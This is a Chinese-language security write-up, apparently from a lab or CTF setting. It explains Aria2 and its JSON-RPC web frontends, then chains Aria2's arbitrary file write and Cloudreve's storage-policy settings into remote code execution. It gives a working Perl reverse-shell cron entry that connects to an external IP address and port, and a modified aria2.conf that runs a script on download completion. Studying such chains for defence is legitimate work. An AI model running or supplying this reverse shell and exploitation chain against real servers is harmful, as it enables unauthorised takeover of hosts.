Aria2&Cloudreve&任意文件写入到RCE
什么是Aria2
Aria2 是一个轻量级的命令行下载工具,支持多种下载协议,如 HTTP、FTP、SFTP、BitTorrent 和 Metalink。它以其强大的多源下载能力而著称,可以同时从多个服务器或对等节点下载文件,加快下载速度。Aria2 占用资源少,适合在服务器或嵌入式系统上使用,常用于需要高效、稳定下载任务的场景。由于它是命令行工具,用户通常配合像 YAAW 这样的 Web 前端界面来简化操作。
Aria2命令行常见操作
Aria2 常见的操作主要通过命令行进行,以下是一些基础操作的简单介绍:
1.下载单个文件
aria2c https://example.com/file.zip
这会从指定的 URL 下载文件到当前目录。
2.从多个源下载文件:
aria2c https://example.com/file.zip ftp://example.org/file.zip
Aria2 会同时从多个源下载文件,加快速度。
3.使用 BitTorrent 协议下载:
aria2c file.torrent
或者使用磁力链接
aria2c 'magnet:?xt=urn:btih:xxxxxxxx'
4.断点续传:
aria2c -c https://example.com/file.zip
如果下载中断,可以用 -c
参数继续下载未完成的部分。
5.批量下载:将多个下载链接写入一个文件(如 downloads.txt
),然后使用:
aria2c -i downloads.txt
Aria2 会自动依次下载文件。
6.限制下载速度:
aria2c --max-download-limit=500K https://example.com/file.zip
这样可以将下载速度限制为每秒 500KB。
Aria2-Web
Aria2 的 Web 前端通常通过 RPC 接口与后台的 Aria2 交互,因此 URL 主要用于与 Aria2 的 JSON-RPC 服务通信。具体的 URL 结构取决于你使用的 Web 前端和服务器配置。以下是 Aria2 和一些常见 Web 前端相关的 URL:
- Aria2 的 JSON-RPC URL
Aria2 默认通过以下 URL 提供 JSON-RPC 服务:
http://<host>:6800/jsonrpc
其中:
-
<host>
是 Aria2 运行的服务器的 IP 地址或域名,localhost
表示本地主机。 -
6800
是默认的 RPC 端口,用户可以在配置文件中更改。
例如:
http://localhost:6800/jsonrpc
这就是 Web 前端用来向 Aria2 发送 RPC 请求的 URL。
- 常见 Aria2 Web 前端
一些常用的 Aria2 Web 前端,如 YAAW ,会有自己的前端 URL,用于通过浏览器访问和控制 Aria2。以下是它们的 URL 示例:
YAAW(Yet Another Aria2 Web Frontend)
YAAW 是一个简单的 Web 前端,通常放置在Web 服务器中,并通过以下 URL 访问:
http://<host>:<port>/yaaw/index.html
例如:
http://localhost:8080/yaaw/index.html
3.设置 RPC URL 的位置
在 Web 前端的设置中,通常需要手动配置 Aria2 的 JSON-RPC URL,确保它能正确连接到你的 Aria2 服务器。这个 URL 通常是:
http://<host>:6800/jsonrpc
通过此配置,Web 前端可以通过 JSON-RPC 接口与 Aria2 后台进行通信,执行下载任务的管理操作。
总结起来,Aria2 的 Web URL 主要分为两部分:Aria2 的 JSON-RPC 接口 URL(如 http://localhost:6800/jsonrpc
),以及不同 Web 前端的访问 URL(如 YAAW 或 AriaNg 的前端页面)。
Aria2任意文件写入漏洞
参考这篇文章
https://paper.seebug.org/120/#abstract
可以写入ssh公钥再带着私钥连接
也可以写/etc/cron.d来计划任务RCE
用vulhub的aria2环境
https://github.com/thedogb/yaaw-docker
用yaaw来web交互
先设置靶机的json-rpc路径
再设置下载任务,填写恶意shell的url,受害主机shell文件的存储路径(/etc/cron.d)
恶意shell
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="124.222.136.33";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
成功反弹shell
集成 Aria2--Cloudreve漏洞
Cloudreve 通过 RPC 接口 将 Aria2 的下载管理功能集成。通过这种集成,Cloudreve 能够利用 Aria2 的强大下载能力,提供更快速和多样化的文件下载体验,特别是适用于离线下载和加速下载场景。
/root/backup.sh 是一个备份脚本,我们尝试利用 Cloudreve 拿到这个文件的编辑权限
下面是对如何拿到一个文件的编辑权限的说明:
我们前往管理面板,在存储策略这里点击专家模式修改
这样进行设置,再在文件中进行导入
可以看到能够在根目录看到我们的文件
可以直接进行修改
这样就可以任意修改文件,修改/usr/aria2/aria2.conf,指定下载完成时需要运行的恶意脚本
dir=/usr/aria2/data
disable-ipv6=true
enable-rpc=true
max-download-limit=0
max-upload-limit=0
rpc-allow-origin-all=true
rpc-listen-all=true
rpc-listen-port=6801
rpc-secure=false
seed-ratio=0
seed-time=0
on-bt-download-complete=/root/backup.sh
on-download-complete=/root/backup.sh
先随便离线下载,重新加载aria2.conf
最后再上传一个离线下载任务触发/root/backup.sh
成功反弹shell